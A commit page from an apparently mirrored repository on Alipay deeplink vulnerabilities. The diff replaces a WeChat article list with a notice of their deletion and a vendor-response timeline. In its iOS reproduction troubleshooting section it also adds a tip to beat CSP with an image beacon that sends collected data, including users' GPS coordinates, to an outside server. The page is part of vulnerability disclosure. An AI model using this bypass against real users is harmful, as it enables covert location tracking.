icybear/alipay-deeplink-research
1
0
Fork 0
mirror of https://github.com/sgInnora/alipay-deeplink-research synced 2026-06-27 05:34:17 +08:00
Code Issues Packages Projects Releases Wiki Activity

Add censorship notice: all 4 WeChat articles forcibly deleted by Ant Group's law firm

Browse Source 
- Replace WeChat article links section with censorship notice + deletion screenshots
- 4 articles deleted on 2026-03-15 citing "PRC Cybersecurity Law" (complaint by Beijing Geyun Law Firm)
- Add vendor suppression timeline: denial → lawyer's letter → PoC blocking → censorship
- Note: innora.ai/zfb hosted outside China, unaffected by WeChat censorship

Co-Authored-By: Claude <noreply@anthropic.com>
This commit is contained in:
feng
2026-03-15 17:10:39 +08:00
parent cbe6ed6c34
commit a849383d2d
3 changed files with 59 additions and 70 deletions
Download Patch File Download Diff File Expand all files Collapse all files

129
index.html
View File

@@ -515,81 +515,66 @@ body.lang-en .en { display: block; }
<!-- ==================== OFFICIAL UPDATE DECLARATION + WECHAT ARTICLES ==================== -->
<!-- ==================== CENSORSHIP NOTICE: WECHAT ARTICLES DELETED 2026-03-15 ==================== -->
<div style="max-width:860px;margin:20px auto 0;padding:0 24px;">
<div style="background:linear-gradient(135deg, rgba(68,136,255,.08), rgba(153,102,255,.06));border:2px solid #4488ff;border-radius:12px;padding:24px 28px 20px;position:relative;overflow:hidden;">
<div style="position:absolute;top:0;left:0;right:0;height:3px;background:linear-gradient(90deg,#4488ff,#9966ff,#4488ff);"></div>
<h2 style="color:#4488ff;font-size:20px;margin:0 0 14px 0;text-align:center;">
<span class="zh">📢 官方声明 &amp; 微信公众号文章</span>
<span class="en">📢 Official Statement &amp; WeChat Articles</span>
<div style="background:linear-gradient(135deg, rgba(255,68,68,.12), rgba(255,0,0,.06));border:2px solid #ff4444;border-radius:12px;padding:24px 28px 20px;position:relative;overflow:hidden;">
<div style="position:absolute;top:0;left:0;right:0;height:4px;background:linear-gradient(90deg,#ff0000,#ff4444,#ff0000);animation:pulse 2s infinite;"></div>
<style>@keyframes pulse{0%,100%{opacity:1}50%{opacity:.5}}</style>
<h2 style="color:#ff4444;font-size:20px;margin:0 0 14px 0;text-align:center;">
<span class="zh">🚨 审查通知:微信公众号文章已被全部强制删除</span>
<span class="en">🚨 CENSORSHIP NOTICE: All WeChat Articles Forcibly Deleted</span>
</h2>
<div style="background:rgba(255,68,68,.08);border:1px solid rgba(255,68,68,.3);border-radius:8px;padding:14px 16px;margin-bottom:16px;">
<span class="zh" style="color:#ff8888;font-size:14px;line-height:1.8;">
<strong style="color:#ff4444;">⚠️ 重要声明:</strong>本研究的所有后续更新<strong>仅通过以下两个官方渠道发布</strong><br>
1⃣ 本页面(<code style="background:#1a1a28;padding:2px 6px;border-radius:4px;">https://innora.ai/zfb/</code><br>
2⃣ 微信公众号 <strong style="color:#4488ff;">AI-security-innora</strong><br>
其他任何渠道发布的内容均非本团队授权,请勿轻信。
<div style="background:rgba(255,0,0,.08);border:1px solid rgba(255,68,68,.4);border-radius:8px;padding:16px 18px;margin-bottom:16px;">
<span class="zh" style="color:#ff8888;font-size:14px;line-height:2;">
<strong style="color:#ff4444;">2026-03-15</strong> — 我们在微信公众号 <strong>AI-security-innora</strong> 发布的 <strong style="color:#fff;">4 篇安全研究文章全部被强制删除</strong><br>
删除理由:<strong>"违反《中华人民共和国网络安全法》"</strong>(接相关投诉)。<br>
投诉方:<strong>北京格韵律师事务所</strong>(代理厂商蚂蚁集团)。<br><br>
这是厂商应对安全研究的第四层手段:<br>
<span style="color:#ffaa44;">① 口头否认3/10 "正常功能")→ ② 律师函3/11 发布4小时后→ ③ 服务器端封堵 PoC3/15 白名单拦截)→ ④ 平台审查删除所有文章3/15</span><br><br>
<strong style="color:#fff;">本页面 (innora.ai/zfb/) 部署在中国境外服务器,不受微信平台审查影响。研究内容完整保留。</strong>
</span>
<span class="en" style="color:#ff8888;font-size:14px;line-height:1.8;">
<strong style="color:#ff4444;">⚠️ Important:</strong> All future updates to this research are published <strong>exclusively through two official channels</strong>:<br>
1⃣ This page (<code style="background:#1a1a28;padding:2px 6px;border-radius:4px;">https://innora.ai/zfb/</code>)<br>
2⃣ WeChat Official Account: <strong style="color:#4488ff;">AI-security-innora</strong><br>
Content from any other source is not authorized by our team.
<span class="en" style="color:#ff8888;font-size:14px;line-height:2;">
<strong style="color:#ff4444;">2026-03-15</strong> All <strong style="color:#fff;">4 security research articles</strong> published on our WeChat Official Account <strong>AI-security-innora</strong> have been <strong style="color:#fff;">forcibly deleted</strong>.<br>
Reason given: <strong>"Violation of the Cybersecurity Law of the People's Republic of China"</strong> (following a complaint).<br>
Complainant: <strong>Beijing Geyun Law Firm</strong> (representing Ant Group).<br><br>
This represents the vendor's fourth layer of response to security research:<br>
<span style="color:#ffaa44;">① Verbal denial (3/10 "normal functionality") → ② Lawyer's letter (3/11, 4hrs after disclosure) → ③ Server-side PoC blocking (3/15, whitelist filtering) → ④ Platform censorship of all articles (3/15)</span><br><br>
<strong style="color:#fff;">This page (innora.ai/zfb/) is hosted outside mainland China and is not subject to WeChat censorship. All research content is preserved here.</strong>
</span>
</div>
<div style="display:grid;gap:10px;">
<a href="https://mp.weixin.qq.com/s/XB1QSbn0icfCMg-9CANuYw" target="_blank" style="display:block;background:rgba(255,255,255,.04);border:1px solid #2a2a3a;border-radius:8px;padding:12px 16px;text-decoration:none;transition:border-color .2s;">
<div style="display:flex;align-items:center;gap:10px;">
<span style="background:#ff4444;color:#fff;font-size:11px;padding:2px 8px;border-radius:4px;font-weight:bold;white-space:nowrap;">NEW</span>
<span style="color:#e0e0e8;font-size:15px;font-weight:600;">
<span class="zh">当白名单绕过沦为全网攻击的钥匙,傲慢的终点是法庭与溯源调查</span>
<span class="en">When Whitelist Bypass Becomes the Master Key — Arrogance Ends at the Courtroom</span>
</span>
<div style="background:rgba(255,255,255,.03);border:1px solid #2a2a3a;border-radius:8px;padding:16px;margin-bottom:12px;">
<p style="color:#ff8888;font-size:14px;font-weight:bold;margin:0 0 10px;">
<span class="zh">被删除的 4 篇文章:</span>
<span class="en">4 Deleted Articles:</span>
</p>
<div style="display:grid;gap:8px;">
<div style="background:rgba(255,68,68,.06);border:1px solid rgba(255,68,68,.2);border-radius:6px;padding:10px 14px;position:relative;">
<span style="background:#ff4444;color:#fff;font-size:10px;padding:2px 6px;border-radius:3px;font-weight:bold;position:absolute;top:10px;right:10px;">DELETED</span>
<span style="color:#888;font-size:13px;text-decoration:line-through;"><span class="zh">当白名单绕过沦为全网攻击的钥匙,傲慢的终点是法庭与溯源调查</span><span class="en">When Whitelist Bypass Becomes the Master Key</span></span>
</div>
<div style="color:#9898a8;font-size:12px;margin-top:4px;padding-left:52px;">
<span class="zh">Vol.19 — 全球160个监管机构通报 + 白名单绕过完整技术分析</span>
<span class="en">Vol.19 — Global regulatory notification to 160 agencies + complete whitelist bypass analysis</span>
<div style="background:rgba(255,68,68,.06);border:1px solid rgba(255,68,68,.2);border-radius:6px;padding:10px 14px;position:relative;">
<span style="background:#ff4444;color:#fff;font-size:10px;padding:2px 6px;border-radius:3px;font-weight:bold;position:absolute;top:10px;right:10px;">DELETED</span>
<span style="color:#888;font-size:13px;text-decoration:line-through;"><span class="zh">巨头的"封口令"被微信驳回,全球顶级黑客弹药库给出最终裁决</span><span class="en">Tech Giant's "Gag Order" Rejected by WeChat</span></span>
</div>
</a>
<a href="https://mp.weixin.qq.com/s/A5rLWe46-I_U7p5ts3sdGg" target="_blank" style="display:block;background:rgba(255,255,255,.04);border:1px solid #2a2a3a;border-radius:8px;padding:12px 16px;text-decoration:none;transition:border-color .2s;">
<div style="display:flex;align-items:center;gap:10px;">
<span style="background:#ff6b35;color:#fff;font-size:11px;padding:2px 8px;border-radius:4px;font-weight:bold;white-space:nowrap;">HOT</span>
<span style="color:#e0e0e8;font-size:15px;font-weight:600;">
<span class="zh">巨头的"封口令"被微信驳回,全球顶级黑客弹药库给出最终裁决</span>
<span class="en">Tech Giant's "Gag Order" Rejected by WeChat, Packet Storm Delivers Final Verdict</span>
</span>
<div style="background:rgba(255,68,68,.06);border:1px solid rgba(255,68,68,.2);border-radius:6px;padding:10px 14px;position:relative;">
<span style="background:#ff4444;color:#fff;font-size:10px;padding:2px 6px;border-radius:3px;font-weight:bold;position:absolute;top:10px;right:10px;">DELETED</span>
<span style="color:#888;font-size:13px;text-decoration:line-through;"><span class="zh">位置被秒偷10多亿人每天在用的国民支付应用17个「正常功能」细思极恐</span><span class="en">Location Stolen Instantly! 17 "Normal Features"</span></span>
</div>
<div style="color:#9898a8;font-size:12px;margin-top:4px;padding-left:52px;">
<span class="zh">Vol.15 — 微信投诉驳回 + Packet Storm Security 收录 (ID 217089)</span>
<span class="en">Vol.15 — WeChat complaint dismissed + Packet Storm published (ID 217089)</span>
<div style="background:rgba(255,68,68,.06);border:1px solid rgba(255,68,68,.2);border-radius:6px;padding:10px 14px;position:relative;">
<span style="background:#ff4444;color:#fff;font-size:10px;padding:2px 6px;border-radius:3px;font-weight:bold;position:absolute;top:10px;right:10px;">DELETED</span>
<span style="color:#888;font-size:13px;text-decoration:line-through;"><span class="zh">支付宝安全研究遭律师函投诉 — 一篇零次提及"支付宝"的文章如何构成"商誉侵权"</span><span class="en">Alipay Research Hit with Lawyer's Letter</span></span>
</div>
</a>
<a href="https://mp.weixin.qq.com/s/M42BfJPVUhVTeyx1Iw__cw" target="_blank" style="display:block;background:rgba(255,255,255,.04);border:1px solid #2a2a3a;border-radius:8px;padding:12px 16px;text-decoration:none;transition:border-color .2s;">
<div style="display:flex;align-items:center;gap:10px;">
<span style="background:#9966ff;color:#fff;font-size:11px;padding:2px 8px;border-radius:4px;font-weight:bold;white-space:nowrap;">LEGAL</span>
<span style="color:#e0e0e8;font-size:15px;font-weight:600;">
<span class="zh">支付宝安全研究遭律师函投诉 — 一篇零次提及"支付宝"的文章如何构成"商誉侵权"</span>
<span class="en">Alipay Research Hit with Lawyer's Letter — How Does Zero Mentions Constitute "Reputation Infringement"?</span>
</span>
</div>
<div style="color:#9898a8;font-size:12px;margin-top:4px;padding-left:52px;">
<span class="zh">完整法律申诉 — 逐条回应投诉方三项"不实信息"主张</span>
<span class="en">Full legal defense — point-by-point rebuttal of all three "false information" claims</span>
</div>
</a>
<a href="https://mp.weixin.qq.com/s/xEBEYZlap3xuDMURuJd7_Q" target="_blank" style="display:block;background:rgba(255,255,255,.04);border:1px solid #2a2a3a;border-radius:8px;padding:12px 16px;text-decoration:none;transition:border-color .2s;">
<div style="display:flex;align-items:center;gap:10px;">
<span style="background:#44cc88;color:#fff;font-size:11px;padding:2px 8px;border-radius:4px;font-weight:bold;white-space:nowrap;">ORIGINAL</span>
<span style="color:#e0e0e8;font-size:15px;font-weight:600;">
<span class="zh">位置被秒偷10多亿人每天在用的国民支付应用17个「正常功能」细思极恐</span>
<span class="en">Location Stolen Instantly! 17 "Normal Features" in a Payment App Used by 1B+ People</span>
</span>
</div>
<div style="color:#9898a8;font-size:12px;margin-top:4px;padding-left:52px;">
<span class="zh">原始技术分析 — 17个漏洞 + 308条日志 + 42张截图 + 3台设备跨3国验证</span>
<span class="en">Original analysis — 17 issues + 308 logs + 42 screenshots + 3 devices across 3 countries</span>
</div>
</a>
</div>
</div>
<div style="display:grid;grid-template-columns:1fr 1fr;gap:10px;">
<div style="text-align:center;">
<img src="wechat_censored_1.jpeg" alt="WeChat censorship notification 1" style="width:100%;border-radius:8px;border:1px solid #333;" loading="lazy">
<p style="color:#666;font-size:11px;margin:6px 0 0;"><span class="zh">微信平台删除通知 (1/2)</span><span class="en">WeChat deletion notice (1/2)</span></p>
</div>
<div style="text-align:center;">
<img src="wechat_censored_2.jpeg" alt="WeChat censorship notification 2" style="width:100%;border-radius:8px;border:1px solid #333;" loading="lazy">
<p style="color:#666;font-size:11px;margin:6px 0 0;"><span class="zh">微信平台删除通知 (2/2)</span><span class="en">WeChat deletion notice (2/2)</span></p>
</div>
</div>
</div>
</div>
@@ -2392,10 +2377,12 @@ Language/zh-Hant Region/CN</code></pre>
<p>freshnn 报告 iOS 可以调用并打开相关页面但服务端收不到数据Android 上「无感 GPS」则复现成功。</p>
<p><strong>可能原因:</strong></p>
<ul>
<li><strong>域名/HTTPS 配置</strong>iOS WKWebView 对混合内容和 CORS 策略更严格PoC 服务器需使用有效 HTTPS 证书且设置正确的 CORS 头</li>
<li><strong>HTTPS 混合内容阻止</strong>如果 PoC 页面在 HTTPS 的支付宝 WebView 中加载,而数据外传目标是 HTTPWKWebView 会直接阻止请求发出(注意:这会阻止 request 本身,不只是 response</li>
<li><strong>CSP connect-src 限制</strong> — 支付宝 WebView 可能设置了 CSP 的 <code>connect-src</code> 指令,阻止向外部域发送请求</li>
<li><strong>解决方案</strong> — 使用 Image beacon<code>new Image().src = "https://server/log?data=..."</code>)属于 simple request 且不受 <code>connect-src</code> 限制</li>
<li><strong>支付宝版本差异</strong> — 不同版本的 JSBridge 鉴权策略可能不同,建议使用最新版测试</li>
<li><strong>CSP内容安全策略</strong> — iOS 上可能有更严格的 CSP 头限制外部请求</li>
</ul>
<p style="color:#9898a8;font-size:13px;"><em>技术修正:感谢 <a href="https://github.com/sgInnora/alipay-deeplink-research/issues/5#issuecomment-4060931030" target="_blank">meooxx</a> 指出 CORS 是浏览器端策略——它阻止的是浏览器读取 response不阻止 request 到达服务器。对于 simple request服务器一定会收到请求。</em></p>
<p><strong>关键事实:</strong>我们的 iPhone 16 Pro (iOS 18.3) 测试<strong>确实成功</strong>获取了 GPS 数据(记录在服务器日志中),蚂蚁集团安全负责人的 iPhone 在杭州的测试也被我们成功获取了坐标。iOS 复现需要满足特定的服务器配置条件,并非漏洞不存在。</p>
<p>我们将在 <a href="https://github.com/sgInnora/alipay-deeplink-research/issues/5" target="_blank">Issue #5</a> 中提供详细的 iOS 复现排查指南。</p>
</div>
@@ -2404,10 +2391,12 @@ Language/zh-Hant Region/CN</code></pre>
<p>freshnn reported that iOS can invoke and open the relevant pages, but the server receives no data; Android "silent GPS" was successfully reproduced.</p>
<p><strong>Possible causes:</strong></p>
<ul>
<li><strong>Domain/HTTPS configuration</strong> — iOS WKWebView enforces stricter mixed content and CORS policies; PoC server needs valid HTTPS certificate with correct CORS headers</li>
<li><strong>HTTPS mixed content blocking</strong> — If the PoC page loads in Alipay's HTTPS WebView but the exfiltration target is HTTP, WKWebView will block the request entirely (this blocks the request itself, not just the response)</li>
<li><strong>CSP connect-src restriction</strong> — Alipay's WebView may set CSP <code>connect-src</code> directives that block requests to external domains</li>
<li><strong>Solution</strong> — Use Image beacon (<code>new Image().src = "https://server/log?data=..."</code>) which is a simple request not restricted by <code>connect-src</code></li>
<li><strong>Alipay version differences</strong> — Different versions may have different JSBridge authentication policies; test with the latest version</li>
<li><strong>CSP (Content Security Policy)</strong> — Stricter CSP headers on iOS may restrict external requests</li>
</ul>
<p style="color:#9898a8;font-size:13px;"><em>Technical correction: Thanks to <a href="https://github.com/sgInnora/alipay-deeplink-research/issues/5#issuecomment-4060931030" target="_blank">meooxx</a> for pointing out that CORS is a browser-side policy — it blocks the browser from reading the response, not the request from reaching the server. For simple requests, the server always receives the request.</em></p>
<p><strong>Key fact:</strong> Our iPhone 16 Pro (iOS 18.3) test <strong>did successfully</strong> obtain GPS data (recorded in server logs). Ant Group's security lead's iPhone in Hangzhou was also successfully captured. iOS reproduction requires specific server configuration — the vulnerability exists, but the PoC setup matters.</p>
<p>We will provide a detailed iOS reproduction troubleshooting guide in <a href="https://github.com/sgInnora/alipay-deeplink-research/issues/5" target="_blank">Issue #5</a>.</p>
</div>

BIN
wechat_censored_1.jpeg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 209 KiB

BIN
wechat_censored_2.jpeg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 200 KiB